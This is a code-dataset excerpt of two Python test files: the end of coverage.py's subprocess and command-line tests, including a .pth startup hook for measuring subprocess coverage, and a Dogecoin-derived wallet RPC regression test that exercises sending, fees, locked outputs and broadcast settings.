self.assertIn('"DATA": "xyzzy"', actual)
if env.JYTHON: # pragma: only jython
# Argv0 is different for Jython, remove that from the comparison.
expected = re_lines(expected, r'\s+"argv0":', match=False)
actual = re_lines(actual, r'\s+"argv0":', match=False)
self.assertMultiLineEqual(expected, actual)
def test_coverage_run_is_like_python(self):
with open(TRY_EXECFILE) as f:
self.make_file("run_me.py", f.read())
expected = self.run_command("python run_me.py")
actual = self.run_command("coverage run run_me.py")
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_far_away_is_like_python(self):
with open(TRY_EXECFILE) as f:
self.make_file("sub/overthere/prog.py", f.read())
expected = self.run_command("python sub/overthere/prog.py")
actual = self.run_command("coverage run sub/overthere/prog.py")
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dashm_is_like_python_dashm(self):
# These -m commands assume the coverage tree is on the path.
expected = self.run_command("python -m process_test.try_execfile")
actual = self.run_command("coverage run -m process_test.try_execfile")
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dir_is_like_python_dir(self):
if env.PYVERSION == (3, 5, 4, 'final', 0): # pragma: obscure
self.skipTest("3.5.4 broke this: https://bugs.python.org/issue32551")
with open(TRY_EXECFILE) as f:
self.make_file("with_main/__main__.py", f.read())
expected = self.run_command("python with_main")
actual = self.run_command("coverage run with_main")
# PyPy includes the current directory in the path when running a
# directory, while CPython and coverage.py do not. Exclude that from
# the comparison also...
if env.PYPY:
ignored = re.escape(os.getcwd())
expected = re_lines(expected, ignored, match=False)
actual = re_lines(actual, ignored, match=False)
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dashm_dir_no_init_is_like_python(self):
with open(TRY_EXECFILE) as f:
self.make_file("with_main/__main__.py", f.read())
expected = self.run_command("python -m with_main")
actual = self.run_command("coverage run -m with_main")
if env.PY2:
assert expected.endswith("No module named with_main\n")
assert actual.endswith("No module named with_main\n")
else:
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dashm_dir_with_init_is_like_python(self):
if env.PY2:
self.skipTest("Python 2 runs __main__ twice, I can't be bothered to make it work.")
with open(TRY_EXECFILE) as f:
self.make_file("with_main/__main__.py", f.read())
self.make_file("with_main/__init__.py", "")
expected = self.run_command("python -m with_main")
actual = self.run_command("coverage run -m with_main")
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dashm_equal_to_doubledashsource(self):
"""regression test for #328
When imported by -m, a module's __name__ is __main__, but we need the
--source machinery to know and respect the original name.
"""
# These -m commands assume the coverage tree is on the path.
expected = self.run_command("python -m process_test.try_execfile")
actual = self.run_command(
"coverage run --source process_test.try_execfile -m process_test.try_execfile"
)
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dashm_superset_of_doubledashsource(self):
"""Edge case: --source foo -m foo.bar"""
# Ugh: without this config file, we'll get a warning about
# Coverage.py warning: Module process_test was previously imported,
# but not measured (module-not-measured)
#
# This is because process_test/__init__.py is imported while looking
# for process_test.try_execfile. That import happens while setting
# sys.path before start() is called.
self.make_file(".coveragerc", """\
[run]
disable_warnings = module-not-measured
""")
# These -m commands assume the coverage tree is on the path.
expected = self.run_command("python -m process_test.try_execfile")
actual = self.run_command(
"coverage run --source process_test -m process_test.try_execfile"
)
self.assert_tryexecfile_output(expected, actual)
st, out = self.run_command_status("coverage report")
self.assertEqual(st, 0)
self.assertEqual(self.line_count(out), 6, out)
def test_coverage_run_script_imports_doubledashsource(self):
# This file imports try_execfile, which compiles it to .pyc, so the
# first run will have __file__ == "try_execfile.py" and the second will
# have __file__ == "try_execfile.pyc", which throws off the comparison.
# Setting dont_write_bytecode True stops the compilation to .pyc and
# keeps the test working.
self.make_file("myscript", """\
import sys; sys.dont_write_bytecode = True
import process_test.try_execfile
""")
expected = self.run_command("python myscript")
actual = self.run_command("coverage run --source process_test myscript")
self.assert_tryexecfile_output(expected, actual)
st, out = self.run_command_status("coverage report")
self.assertEqual(st, 0)
self.assertEqual(self.line_count(out), 6, out)
def test_coverage_run_dashm_is_like_python_dashm_off_path(self):
# https://bitbucket.org/ned/coveragepy/issue/242
self.make_file("sub/__init__.py", "")
with open(TRY_EXECFILE) as f:
self.make_file("sub/run_me.py", f.read())
expected = self.run_command("python -m sub.run_me")
actual = self.run_command("coverage run -m sub.run_me")
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dashm_is_like_python_dashm_with__main__207(self):
# https://bitbucket.org/ned/coveragepy/issue/207
self.make_file("package/__init__.py", "print('init')")
self.make_file("package/__main__.py", "print('main')")
expected = self.run_command("python -m package")
actual = self.run_command("coverage run -m package")
self.assertMultiLineEqual(expected, actual)
def test_coverage_custom_script(self):
# https://github.com/nedbat/coveragepy/issues/678
# If sys.path[0] isn't the Python default, then coverage.py won't
# fiddle with it.
self.make_file("a/b/c/thing.py", """\
SOMETHING = "hello-xyzzy"
""")
abc = os.path.abspath("a/b/c")
self.make_file("run_coverage.py", """\
import sys
sys.path[0:0] = [
r'{abc}',
'/Users/somebody/temp/something/eggs/something-4.5.1-py2.7-xxx-10.13-x86_64.egg',
]
import coverage.cmdline
if __name__ == '__main__':
sys.exit(coverage.cmdline.main())
""".format(abc=abc))
self.make_file("how_is_it.py", """\
import pprint, sys
pprint.pprint(sys.path)
import thing
print(thing.SOMETHING)
""")
# If this test fails, it will be with "can't import thing".
out = self.run_command("python run_coverage.py run how_is_it.py")
self.assertIn("hello-xyzzy", out)
out = self.run_command("python -m run_coverage run how_is_it.py")
self.assertIn("hello-xyzzy", out)
class ExcepthookTest(CoverageTest):
"""Tests of sys.excepthook support."""
def test_excepthook(self):
self.make_file("excepthook.py", """\
import sys
def excepthook(*args):
print('in excepthook')
if maybe == 2:
print('definitely')
sys.excepthook = excepthook
maybe = 1
raise RuntimeError('Error Outside')
""")
cov_st, cov_out = self.run_command_status("coverage run excepthook.py")
py_st, py_out = self.run_command_status("python excepthook.py")
if not env.JYTHON:
self.assertEqual(cov_st, py_st)
self.assertEqual(cov_st, 1)
self.assertIn("in excepthook", py_out)
self.assertEqual(cov_out, py_out)
# Read the coverage file and see that excepthook.py has 7 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['excepthook.py'], 7)
def test_excepthook_exit(self):
if env.PYPY or env.JYTHON:
self.skipTest("non-CPython handles excepthook exits differently, punt for now.")
self.make_file("excepthook_exit.py", """\
import sys
def excepthook(*args):
print('in excepthook')
sys.exit(0)
sys.excepthook = excepthook
raise RuntimeError('Error Outside')
""")
cov_st, cov_out = self.run_command_status("coverage run excepthook_exit.py")
py_st, py_out = self.run_command_status("python excepthook_exit.py")
self.assertEqual(cov_st, py_st)
self.assertEqual(cov_st, 0)
self.assertIn("in excepthook", py_out)
self.assertEqual(cov_out, py_out)
def test_excepthook_throw(self):
if env.PYPY:
self.skipTest("PyPy handles excepthook throws differently, punt for now.")
self.make_file("excepthook_throw.py", """\
import sys
def excepthook(*args):
# Write this message to stderr so that we don't have to deal
# with interleaved stdout/stderr comparisons in the assertions
# in the test.
sys.stderr.write('in excepthook\\n')
raise RuntimeError('Error Inside')
sys.excepthook = excepthook
raise RuntimeError('Error Outside')
""")
cov_st, cov_out = self.run_command_status("coverage run excepthook_throw.py")
py_st, py_out = self.run_command_status("python excepthook_throw.py")
if not env.JYTHON:
self.assertEqual(cov_st, py_st)
self.assertEqual(cov_st, 1)
self.assertIn("in excepthook", py_out)
self.assertEqual(cov_out, py_out)
class AliasedCommandTest(CoverageTest):
"""Tests of the version-specific command aliases."""
run_in_temp_dir = False
def setUp(self):
if env.JYTHON:
self.skipTest("Coverage command names don't work on Jython")
super(AliasedCommandTest, self).setUp()
def test_major_version_works(self):
# "coverage2" works on py2
cmd = "coverage%d" % sys.version_info[0]
out = self.run_command(cmd)
self.assertIn("Code coverage for Python", out)
def test_wrong_alias_doesnt_work(self):
# "coverage3" doesn't work on py2
assert sys.version_info[0] in [2, 3] # Let us know when Python 4 is out...
badcmd = "coverage%d" % (5 - sys.version_info[0])
out = self.run_command(badcmd)
self.assertNotIn("Code coverage for Python", out)
def test_specific_alias_works(self):
# "coverage-2.7" works on py2.7
cmd = "coverage-%d.%d" % sys.version_info[:2]
out = self.run_command(cmd)
self.assertIn("Code coverage for Python", out)
def test_aliases_used_in_messages(self):
cmds = [
"coverage",
"coverage%d" % sys.version_info[0],
"coverage-%d.%d" % sys.version_info[:2],
]
for cmd in cmds:
out = self.run_command("%s foobar" % cmd)
self.assertIn("Unknown command: 'foobar'", out)
self.assertIn("Use '%s help' for help" % cmd, out)
class PydocTest(CoverageTest):
"""Test that pydoc can get our information."""
run_in_temp_dir = False
def assert_pydoc_ok(self, name, thing):
"""Check that pydoc of `name` finds the docstring from `thing`."""
# Run pydoc.
out = self.run_command("python -m pydoc " + name)
# It should say "Help on..", and not have a traceback
self.assert_starts_with(out, "Help on ")
self.assertNotIn("Traceback", out)
# All of the lines in the docstring should be there somewhere.
for line in thing.__doc__.splitlines():
self.assertIn(line.strip(), out)
def test_pydoc_coverage(self):
self.assert_pydoc_ok("coverage", coverage)
def test_pydoc_coverage_coverage(self):
self.assert_pydoc_ok("coverage.Coverage", coverage.Coverage)
class FailUnderTest(CoverageTest):
"""Tests of the --fail-under switch."""
def setUp(self):
super(FailUnderTest, self).setUp()
self.make_file("forty_two_plus.py", """\
# I have 42.857% (3/7) coverage!
a = 1
b = 2
if a > 3:
b = 4
c = 5
d = 6
e = 7
""")
st, _ = self.run_command_status("coverage run --source=. forty_two_plus.py")
self.assertEqual(st, 0)
def test_report_43_is_ok(self):
st, out = self.run_command_status("coverage report --fail-under=43")
self.assertEqual(st, 0)
self.assertEqual(self.last_line_squeezed(out), "forty_two_plus.py 7 4 43%")
def test_report_43_is_not_ok(self):
st, out = self.run_command_status("coverage report --fail-under=44")
self.assertEqual(st, 2)
self.assertEqual(self.last_line_squeezed(out), "forty_two_plus.py 7 4 43%")
def test_report_42p86_is_not_ok(self):
self.make_file(".coveragerc", "[report]\nprecision = 2")
st, out = self.run_command_status("coverage report --fail-under=42.88")
self.assertEqual(st, 2)
self.assertEqual(self.last_line_squeezed(out), "forty_two_plus.py 7 4 42.86%")
class FailUnderNoFilesTest(CoverageTest):
"""Test that nothing to report results in an error exit status."""
def test_report(self):
self.make_file(".coveragerc", "[report]\nfail_under = 99\n")
st, out = self.run_command_status("coverage report")
self.assertIn('No data to report.', out)
self.assertEqual(st, 1)
class FailUnderEmptyFilesTest(CoverageTest):
"""Test that empty files produce the proper fail_under exit status."""
def test_report(self):
self.make_file(".coveragerc", "[report]\nfail_under = 99\n")
self.make_file("empty.py", "")
st, _ = self.run_command_status("coverage run empty.py")
self.assertEqual(st, 0)
st, _ = self.run_command_status("coverage report")
self.assertEqual(st, 2)
class UnicodeFilePathsTest(CoverageTest):
"""Tests of using non-ascii characters in the names of files."""
def setUp(self):
if env.JYTHON:
self.skipTest("Jython doesn't like accented file names")
super(UnicodeFilePathsTest, self).setUp()
def test_accented_dot_py(self):
# Make a file with a non-ascii character in the filename.
self.make_file(u"h\xe2t.py", "print('accented')")
out = self.run_command(u"coverage run --source=. h\xe2t.py")
self.assertEqual(out, "accented\n")
# The HTML report uses ascii-encoded HTML entities.
out = self.run_command("coverage html")
self.assertEqual(out, "")
self.assert_exists(u"htmlcov/h\xe2t_py.html")
with open("htmlcov/index.html") as indexf:
index = indexf.read()
self.assertIn('<a href="hât_py.html">hât.py</a>', index)
# The XML report is always UTF8-encoded.
out = self.run_command("coverage xml")
self.assertEqual(out, "")
with open("coverage.xml", "rb") as xmlf:
xml = xmlf.read()
self.assertIn(u' filename="h\xe2t.py"'.encode('utf8'), xml)
self.assertIn(u' name="h\xe2t.py"'.encode('utf8'), xml)
report_expected = (
u"Name Stmts Miss Cover\n"
u"----------------------------\n"
u"h\xe2t.py 1 0 100%\n"
)
if env.PY2:
report_expected = report_expected.encode(output_encoding())
out = self.run_command("coverage report")
self.assertEqual(out, report_expected)
def test_accented_directory(self):
# Make a file with a non-ascii character in the directory name.
self.make_file(u"\xe2/accented.py", "print('accented')")
out = self.run_command(u"coverage run --source=. \xe2/accented.py")
self.assertEqual(out, "accented\n")
# The HTML report uses ascii-encoded HTML entities.
out = self.run_command("coverage html")
self.assertEqual(out, "")
self.assert_exists(u"htmlcov/\xe2_accented_py.html")
with open("htmlcov/index.html") as indexf:
index = indexf.read()
self.assertIn('<a href="â_accented_py.html">â%saccented.py</a>' % os.sep, index)
# The XML report is always UTF8-encoded.
out = self.run_command("coverage xml")
self.assertEqual(out, "")
with open("coverage.xml", "rb") as xmlf:
xml = xmlf.read()
self.assertIn(b' filename="\xc3\xa2/accented.py"', xml)
self.assertIn(b' name="accented.py"', xml)
dom = ElementTree.parse("coverage.xml")
elts = dom.findall(u".//package[@name='â']")
assert len(elts) == 1
assert elts[0].attrib == {
"branch-rate": u"0",
"complexity": u"0",
"line-rate": u"1",
"name": u"â",
}
report_expected = (
u"Name Stmts Miss Cover\n"
u"-----------------------------------\n"
u"\xe2%saccented.py 1 0 100%%\n" % os.sep
)
if env.PY2:
report_expected = report_expected.encode(output_encoding())
out = self.run_command("coverage report")
self.assertEqual(out, report_expected)
class YankedDirectoryTest(CoverageTest):
"""Tests of what happens when the current directory is deleted."""
def setUp(self):
if env.WINDOWS:
self.skipTest("Windows can't delete the directory in use.")
super(YankedDirectoryTest, self).setUp()
BUG_806 = """\
import os
import sys
import tempfile
tmpdir = tempfile.mkdtemp()
os.chdir(tmpdir)
os.rmdir(tmpdir)
print(sys.argv[1])
"""
def test_removing_directory(self):
self.make_file("bug806.py", self.BUG_806)
out = self.run_command("coverage run bug806.py noerror")
self.assertEqual(out, "noerror\n")
def test_removing_directory_with_error(self):
self.make_file("bug806.py", self.BUG_806)
out = self.run_command("coverage run bug806.py")
path = python_reported_file('bug806.py')
self.assertEqual(out, textwrap.dedent("""\
Traceback (most recent call last):
File "{}", line 8, in <module>
print(sys.argv[1])
IndexError: list index out of range
""".format(path)))
def possible_pth_dirs():
"""Produce a sequence of directories for trying to write .pth files."""
# First look through sys.path, and if we find a .pth file, then it's a good
# place to put ours.
for pth_dir in sys.path: # pragma: part covered
pth_files = glob.glob(os.path.join(pth_dir, "*.pth"))
if pth_files:
yield pth_dir
# If we're still looking, then try the Python library directory.
# https://bitbucket.org/ned/coveragepy/issue/339/pth-test-malfunctions
yield distutils.sysconfig.get_python_lib() # pragma: cant happen
def find_writable_pth_directory():
"""Find a place to write a .pth file."""
for pth_dir in possible_pth_dirs(): # pragma: part covered
try_it = os.path.join(pth_dir, "touch_{}.it".format(WORKER))
with open(try_it, "w") as f:
try:
f.write("foo")
except (IOError, OSError): # pragma: cant happen
continue
os.remove(try_it)
return pth_dir
return None # pragma: cant happen
WORKER = os.environ.get('PYTEST_XDIST_WORKER', '')
PTH_DIR = find_writable_pth_directory()
def persistent_remove(path):
"""Remove a file, and retry for a while if you can't."""
tries = 100
while tries: # pragma: part covered
try:
os.remove(path)
except OSError:
tries -= 1
time.sleep(.05)
else:
return
raise Exception("Sorry, couldn't remove {!r}".format(path)) # pragma: cant happen
class ProcessCoverageMixin(object):
"""Set up a .pth file to coverage-measure all sub-processes."""
def setUp(self):
super(ProcessCoverageMixin, self).setUp()
# Create the .pth file.
self.assertTrue(PTH_DIR)
pth_contents = "import coverage; coverage.process_startup()\n"
pth_path = os.path.join(PTH_DIR, "subcover_{}.pth".format(WORKER))
with open(pth_path, "w") as pth:
pth.write(pth_contents)
self.pth_path = pth_path
self.addCleanup(persistent_remove, self.pth_path)
class ProcessStartupTest(ProcessCoverageMixin, CoverageTest):
"""Test that we can measure coverage in sub-processes."""
def setUp(self):
super(ProcessStartupTest, self).setUp()
# Main will run sub.py
self.make_file("main.py", """\
import os, os.path, sys
ex = os.path.basename(sys.executable)
os.system(ex + " sub.py")
""")
# sub.py will write a few lines.
self.make_file("sub.py", """\
f = open("out.txt", "w")
f.write("Hello, world!\\n")
f.close()
""")
def test_subprocess_with_pth_files(self): # pragma: no metacov
if env.METACOV:
self.skipTest("Can't test sub-process pth file suppport during metacoverage")
# An existing data file should not be read when a subprocess gets
# measured automatically. Create the data file here with bogus data in
# it.
data = coverage.CoverageData(".mycovdata")
data.add_lines({os.path.abspath('sub.py'): dict.fromkeys(range(100))})
data.write()
self.make_file("coverage.ini", """\
[run]
data_file = .mycovdata
""")
self.set_environ("COVERAGE_PROCESS_START", "coverage.ini")
import main # pylint: disable=unused-import
with open("out.txt") as f:
self.assertEqual(f.read(), "Hello, world!\n")
# Read the data from .coverage
self.assert_exists(".mycovdata")
data = coverage.CoverageData(".mycovdata")
data.read()
self.assertEqual(line_counts(data)['sub.py'], 3)
def test_subprocess_with_pth_files_and_parallel(self): # pragma: no metacov
# https://bitbucket.org/ned/coveragepy/issues/492/subprocess-coverage-strange-detection-of
if env.METACOV:
self.skipTest("Can't test sub-process pth file suppport during metacoverage")
self.make_file("coverage.ini", """\
[run]
parallel = true
""")
self.set_environ("COVERAGE_PROCESS_START", "coverage.ini")
self.run_command("coverage run main.py")
with open("out.txt") as f:
self.assertEqual(f.read(), "Hello, world!\n")
self.run_command("coverage combine")
# assert that the combined .coverage data file is correct
self.assert_exists(".coverage")
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['sub.py'], 3)
# assert that there are *no* extra data files left over after a combine
data_files = glob.glob(os.getcwd() + '/.coverage*')
self.assertEqual(len(data_files), 1,
"Expected only .coverage after combine, looks like there are "
"extra data files that were not cleaned up: %r" % data_files)
class ProcessStartupWithSourceTest(ProcessCoverageMixin, CoverageTest):
"""Show that we can configure {[run]source} during process-level coverage.
There are three interesting variables, for a total of eight tests:
1. -m versus a simple script argument (for example, `python myscript`),
2. filtering for the top-level (main.py) or second-level (sub.py)
module, and
3. whether the files are in a package or not.
"""
def assert_pth_and_source_work_together(
self, dashm, package, source
): # pragma: no metacov
"""Run the test for a particular combination of factors.
The arguments are all strings:
* `dashm`: Either "" (run the program as a file) or "-m" (run the
program as a module).
* `package`: Either "" (put the source at the top level) or a
package name to use to hold the source.
* `source`: Either "main" or "sub", which file to use as the
``--source`` argument.
"""
if env.METACOV:
self.skipTest("Can't test sub-process pth file support during metacoverage")
def fullname(modname):
"""What is the full module name for `modname` for this test?"""
if package and dashm:
return '.'.join((package, modname))
else:
return modname
def path(basename):
"""Where should `basename` be created for this test?"""
return os.path.join(package, basename)
# Main will run sub.py.
self.make_file(path("main.py"), """\
import %s
a = 2
b = 3
""" % fullname('sub'))
if package:
self.make_file(path("__init__.py"), "")
# sub.py will write a few lines.
self.make_file(path("sub.py"), """\
# Avoid 'with' so Jython can play along.
f = open("out.txt", "w")
f.write("Hello, world!")
f.close()
""")
self.make_file("coverage.ini", """\
[run]
source = %s
""" % fullname(source))
self.set_environ("COVERAGE_PROCESS_START", "coverage.ini")
if dashm:
cmd = "python -m %s" % fullname('main')
else:
cmd = "python %s" % path('main.py')
self.run_command(cmd)
with open("out.txt") as f:
self.assertEqual(f.read(), "Hello, world!")
# Read the data from .coverage
self.assert_exists(".coverage")
data = coverage.CoverageData()
data.read()
summary = line_counts(data)
print(summary)
self.assertEqual(summary[source + '.py'], 3)
self.assertEqual(len(summary), 1)
def test_dashm_main(self):
self.assert_pth_and_source_work_together('-m', '', 'main')
def test_script_main(self):
self.assert_pth_and_source_work_together('', '', 'main')
def test_dashm_sub(self):
self.assert_pth_and_source_work_together('-m', '', 'sub')
def test_script_sub(self):
self.assert_pth_and_source_work_together('', '', 'sub')
def test_dashm_pkg_main(self):
self.assert_pth_and_source_work_together('-m', 'pkg', 'main')
def test_script_pkg_main(self):
self.assert_pth_and_source_work_together('', 'pkg', 'main')
def test_dashm_pkg_sub(self):
self.assert_pth_and_source_work_together('-m', 'pkg', 'sub')
def test_script_pkg_sub(self):
self.assert_pth_and_source_work_together('', 'pkg', 'sub')
| 37.246704 | 100 | 0.595072 |
4a1e635c0d5b4f0916f074d0d7c878c7dea7b5b7 | 18,648 | py | Python | qa/rpc-tests/wallet.py | GamingMad101/dogecoin | 768718dabadf9a9d9b1e178531f8c5f83fdca73c | [
"MIT"
] | 1 | 2021-02-13T21:59:46.000Z | 2021-02-13T21:59:46.000Z | qa/rpc-tests/wallet.py | GamingMad101/dogecoin | 768718dabadf9a9d9b1e178531f8c5f83fdca73c | [
"MIT"
] | null | null | null | qa/rpc-tests/wallet.py | GamingMad101/dogecoin | 768718dabadf9a9d9b1e178531f8c5f83fdca73c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class WalletTest (BitcoinTestFramework):
def check_fee_amount(self, curr_balance, balance_with_fee, fee_per_byte, tx_size):
"""Return curr_balance after asserting the fee was in range"""
fee = balance_with_fee - curr_balance
assert_fee_amount(fee, tx_size, fee_per_byte * 1000)
return curr_balance
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 4
self.extra_args = [['-usehd={:d}'.format(i%2==0)] for i in range(4)]
def setup_network(self, split=False):
self.nodes = start_nodes(3, self.options.tmpdir, self.extra_args[:3])
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.is_network_split=False
self.sync_all()
def run_test (self):
# Check that there's no UTXO on none of the nodes
assert_equal(len(self.nodes[0].listunspent()), 0)
assert_equal(len(self.nodes[1].listunspent()), 0)
assert_equal(len(self.nodes[2].listunspent()), 0)
print("Mining blocks...")
self.nodes[0].generate(1)
walletinfo = self.nodes[0].getwalletinfo()
assert_equal(walletinfo['immature_balance'], 500000)
assert_equal(walletinfo['balance'], 0)
self.sync_all()
self.nodes[1].generate(61)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 500000)
assert_equal(self.nodes[1].getbalance(), 500000)
assert_equal(self.nodes[2].getbalance(), 0)
# Check that only first and second nodes have UTXOs
assert_equal(len(self.nodes[0].listunspent()), 1)
assert_equal(len(self.nodes[1].listunspent()), 1)
assert_equal(len(self.nodes[2].listunspent()), 0)
# Send 210.000 spiff from 0 to 2 using sendtoaddress call.
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 110000)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 100000)
walletinfo = self.nodes[0].getwalletinfo()
assert_equal(walletinfo['immature_balance'], 0)
# Have node0 mine a block, thus it will collect its own fee.
self.nodes[0].generate(1)
self.sync_all()
# Exercise locking of unspent outputs
unspent_0 = self.nodes[2].listunspent()[0]
unspent_0 = {"txid": unspent_0["txid"], "vout": unspent_0["vout"]}
self.nodes[2].lockunspent(False, [unspent_0])
assert_raises_message(JSONRPCException, "Insufficient funds", self.nodes[2].sendtoaddress, self.nodes[2].getnewaddress(), 200000)
assert_equal([unspent_0], self.nodes[2].listlockunspent())
self.nodes[2].lockunspent(True, [unspent_0])
assert_equal(len(self.nodes[2].listlockunspent()), 0)
# Have node1 generate 60 blocks (so node0 can recover the fee)
self.nodes[1].generate(60)
self.sync_all()
# node0 should end up with 1.000.000 spiff in block rewards plus fees, but
# minus the 210.000 plus fees sent to node2
assert_equal(self.nodes[0].getbalance(), 1000000-210000)
assert_equal(self.nodes[2].getbalance(), 210000)
# Node0 should have two unspent outputs.
# Create a couple of transactions to send them to node2, submit them through
# node1, and make sure both node0 and node2 pick them up properly:
node0utxos = self.nodes[0].listunspent(1)
assert_equal(len(node0utxos), 2)
# create both transactions
txns_to_send = []
for utxo in node0utxos:
inputs = []
outputs = {}
inputs.append({ "txid" : utxo["txid"], "vout" : utxo["vout"]})
outputs[self.nodes[2].getnewaddress("from1")] = utxo["amount"] - 3
raw_tx = self.nodes[0].createrawtransaction(inputs, outputs)
txns_to_send.append(self.nodes[0].signrawtransaction(raw_tx))
# Have node 1 (miner) send the transactions
self.nodes[1].sendrawtransaction(txns_to_send[0]["hex"], True)
self.nodes[1].sendrawtransaction(txns_to_send[1]["hex"], True)
# Have node1 mine a block to confirm transactions:
self.nodes[1].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 999994)
assert_equal(self.nodes[2].getbalance("from1"), 999994-210000)
# Send 100000 spiff normal
address = self.nodes[0].getnewaddress("test")
fee_per_byte = Decimal('1') / 1000
self.nodes[2].settxfee(fee_per_byte * 1000)
txid = self.nodes[2].sendtoaddress(address, 100000, "", "", False)
self.nodes[2].generate(1)
self.sync_all()
node_2_bal = self.check_fee_amount(self.nodes[2].getbalance(), Decimal('899994'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
assert_equal(self.nodes[0].getbalance(), Decimal('100000'))
# Send 100000 spiff with subtract fee from amount
txid = self.nodes[2].sendtoaddress(address, 100000, "", "", True)
self.nodes[2].generate(1)
self.sync_all()
node_2_bal -= Decimal('100000')
assert_equal(self.nodes[2].getbalance(), node_2_bal)
node_0_bal = self.check_fee_amount(self.nodes[0].getbalance(), Decimal('200000'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
# Sendmany 100000 spiff
txid = self.nodes[2].sendmany('from1', {address: 100000}, 0, "", [])
self.nodes[2].generate(1)
self.sync_all()
node_0_bal += Decimal('100000')
node_2_bal = self.check_fee_amount(self.nodes[2].getbalance(), node_2_bal - Decimal('100000'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
assert_equal(self.nodes[0].getbalance(), node_0_bal)
# Sendmany 100000 with subtract fee from amount
txid = self.nodes[2].sendmany('from1', {address: 100000}, 0, "", [address])
self.nodes[2].generate(1)
self.sync_all()
node_2_bal -= Decimal('100000')
assert_equal(self.nodes[2].getbalance(), node_2_bal)
node_0_bal = self.check_fee_amount(self.nodes[0].getbalance(), node_0_bal + Decimal('100000'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
# Test ResendWalletTransactions:
# Create a couple of transactions, then start up a fourth
# node (nodes[3]) and ask nodes[0] to rebroadcast.
# EXPECT: nodes[3] should have those transactions in its mempool.
txid1 = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 100000)
txid2 = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 100000)
sync_mempools(self.nodes)
self.nodes.append(start_node(3, self.options.tmpdir, self.extra_args[3]))
connect_nodes_bi(self.nodes, 0, 3)
sync_blocks(self.nodes)
relayed = self.nodes[0].resendwallettransactions()
assert_equal(set(relayed), {txid1, txid2})
sync_mempools(self.nodes)
assert(txid1 in self.nodes[3].getrawmempool())
# Exercise balance rpcs
assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], 100000)
assert_equal(self.nodes[0].getunconfirmedbalance(), 100000)
#check if we can list zero value tx as available coins
#1. create rawtx
#2. hex-changed one output to 0.0
#3. sign and send
#4. check if recipient (node0) can list the zero value tx
usp = self.nodes[1].listunspent()
inputs = [{"txid":usp[0]['txid'], "vout":usp[0]['vout']}]
outputs = {self.nodes[1].getnewaddress(): 499998, self.nodes[0].getnewaddress(): 11.11}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs).replace("c0833842", "00000000") #replace 11.11 with 0.0 (int32)
decRawTx = self.nodes[1].decoderawtransaction(rawTx)
signedRawTx = self.nodes[1].signrawtransaction(rawTx)
decRawTx = self.nodes[1].decoderawtransaction(signedRawTx['hex'])
zeroValueTxid= decRawTx['txid']
sendResp = self.nodes[1].sendrawtransaction(signedRawTx['hex'])
self.sync_all()
self.nodes[1].generate(1) #mine a block
self.sync_all()
unspentTxs = self.nodes[0].listunspent() #zero value tx must be in listunspents output
found = False
for uTx in unspentTxs:
if uTx['txid'] == zeroValueTxid:
found = True
assert_equal(uTx['amount'], Decimal('0'))
assert(found)
#do some -walletbroadcast tests
stop_nodes(self.nodes)
self.nodes = start_nodes(3, self.options.tmpdir, [["-walletbroadcast=0"],["-walletbroadcast=0"],["-walletbroadcast=0"]])
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.sync_all()
txIdNotBroadcasted = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 20000)
txObjNotBroadcasted = self.nodes[0].gettransaction(txIdNotBroadcasted)
self.nodes[1].generate(1) #mine a block, tx should not be in there
self.sync_all()
assert_equal(self.nodes[2].getbalance(), node_2_bal) #should not be changed because tx was not broadcasted
#now broadcast from another node, mine a block, sync, and check the balance
self.nodes[1].sendrawtransaction(txObjNotBroadcasted['hex'])
self.nodes[1].generate(1)
self.sync_all()
node_2_bal += 20000
txObjNotBroadcasted = self.nodes[0].gettransaction(txIdNotBroadcasted)
assert_equal(self.nodes[2].getbalance(), node_2_bal)
#create another tx
txIdNotBroadcasted = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 20000)
#restart the nodes with -walletbroadcast=1
stop_nodes(self.nodes)
self.nodes = start_nodes(3, self.options.tmpdir)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
sync_blocks(self.nodes)
self.nodes[0].generate(1)
sync_blocks(self.nodes)
node_2_bal += 20000
#tx should be added to balance because after restarting the nodes tx should be broadcasted
assert_equal(self.nodes[2].getbalance(), node_2_bal)
#send a tx with value in a string (PR#6380 +)
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "20000")
txObj = self.nodes[0].gettransaction(txId)
assert_equal(txObj['amount'], Decimal('-20000'))
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "1")
txObj = self.nodes[0].gettransaction(txId)
assert_equal(txObj['amount'], Decimal('-1'))
